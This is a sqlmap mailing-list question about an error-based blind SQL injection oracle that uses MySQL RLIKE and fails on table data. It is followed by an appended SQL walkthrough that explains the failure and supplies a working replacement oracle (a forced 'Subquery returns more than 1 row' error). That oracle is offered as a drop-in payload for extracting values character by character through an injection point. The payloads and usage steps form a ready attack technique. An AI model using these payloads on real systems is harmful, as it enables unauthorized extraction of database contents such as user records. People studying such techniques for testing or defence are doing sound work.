Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.
As you can see in the output below, the user can select the first name value from the users table (which is ‘admin’). When using RLIKE to test the first character returned with DATABASE() (a ‘p’), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting ‘a’. But when you select the first row from the users table and grab the first character (an ‘a’), no exception is thrown and an empty result set is returned. Any thoughts?

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
Empty set (0.01 sec)

mysql> SELECT `name` from users LIMIT 0,1;
+-------+
| name  |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)

mysql>
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
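Added example for the question above; it is not part of the original post and not sqlmap's own payload code. It reproduces the two RLIKE cases against a constructed `users` table (assumed schema: `id`, `name`, with 'admin' as the first row), and then shows an alternative error oracle that still fires when the tested value comes from a table. It assumes MySQL 5.x (the Henry Spencer regex engine; MySQL 8.0.4+ uses ICU and words its regex errors differently). The explanation in the comments is a working assumption consistent with the posted output, not something the post confirms: MySQL appears to raise ERROR 1139 for a RLIKE pattern only when it can reduce the pattern to a constant while preparing the statement, whereas a pattern that depends on table data is compiled per row and a compile failure then surfaces as NULL (so the WHERE clause is simply false) instead of an error. ERROR 1242 ("Subquery returns more than 1 row") is a runtime error and is not subject to that distinction.

```sql
-- Added example, not from the original post. Constructed schema and data.
-- Assumes MySQL 5.x; error texts and behaviour may differ on 8.0.4+ (ICU regex).
DROP TABLE IF EXISTS users;
CREATE TABLE users (id INT PRIMARY KEY, name VARCHAR(32));
INSERT INTO users VALUES (1, 'admin'), (2, 'bob');   -- 'a' = ORD 97, not > 112

-- 1. Constant pattern. Both subqueries are tableless, so the CASE folds to
--    0x28 = '(' while the statement is prepared and the regex compile error is
--    raised: ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
SELECT 'm' FROM DUAL
 WHERE 1=1 RLIKE (SELECT CASE WHEN ORD(MID((SELECT 'a'),1,1)) > 112
                              THEN 0x7474747474 ELSE 0x28 END);

-- 2. Same condition, but the pattern now depends on a table row.
--    Observed in the post: Empty set, no error.
SELECT 'm' FROM DUAL
 WHERE 1=1 RLIKE (SELECT CASE WHEN ORD(MID((SELECT name FROM users LIMIT 0,1),1,1)) > 112
                              THEN 0x7474747474 ELSE 0x28 END);

-- Probe what the RLIKE itself evaluates to in case 2. Working assumption (not
-- confirmed by the post): the invalid pattern compiled at row time yields NULL,
-- which makes the WHERE clause false without any error. A 0 would also explain
-- the Empty set; either way, the oracle is silently lost.
SELECT 1 RLIKE (SELECT CASE WHEN ORD(MID((SELECT name FROM users LIMIT 0,1),1,1)) > 112
                            THEN 0x7474747474 ELSE 0x28 END) AS rlike_result;

-- 3. Alternative oracle that raises at execution time regardless of whether the
--    tested value is constant: a scalar subquery returning two rows fails with
--    ERROR 1242 (21000): Subquery returns more than 1 row.
--    CASE is evaluated lazily, so the ELSE subquery runs only when the inference
--    is false. Keeping the error on the FALSE branch matches the RLIKE payload's
--    convention: HTTP 500 = condition false, normal page = condition true.
SELECT 'm' FROM DUAL
 WHERE 1 = (SELECT CASE WHEN ORD(MID((SELECT name FROM users LIMIT 0,1),1,1)) > 112
                        THEN 1
                        ELSE (SELECT 1 UNION ALL SELECT 2) END);
-- 'a' is 97, not > 112 -> ELSE branch -> ERROR 1242

SELECT 'm' FROM DUAL
 WHERE 1 = (SELECT CASE WHEN ORD(MID((SELECT name FROM users LIMIT 0,1),1,1)) > 96
                        THEN 1
                        ELSE (SELECT 1 UNION ALL SELECT 2) END);
-- 'a' is 97 > 96 -> THEN branch -> one row ('m'), no error
```

Statement 3 is a drop-in replacement for the RLIKE oracle in the injection point: keep the same `ORD(MID(...)) > N` inference, binary-search N per character position as before, and read "500 error" as "inference false". Because the 1242 error is produced when the offending subquery actually executes, it behaves the same whether the inner SELECT reads `DATABASE()`, a literal, or a column from `users`.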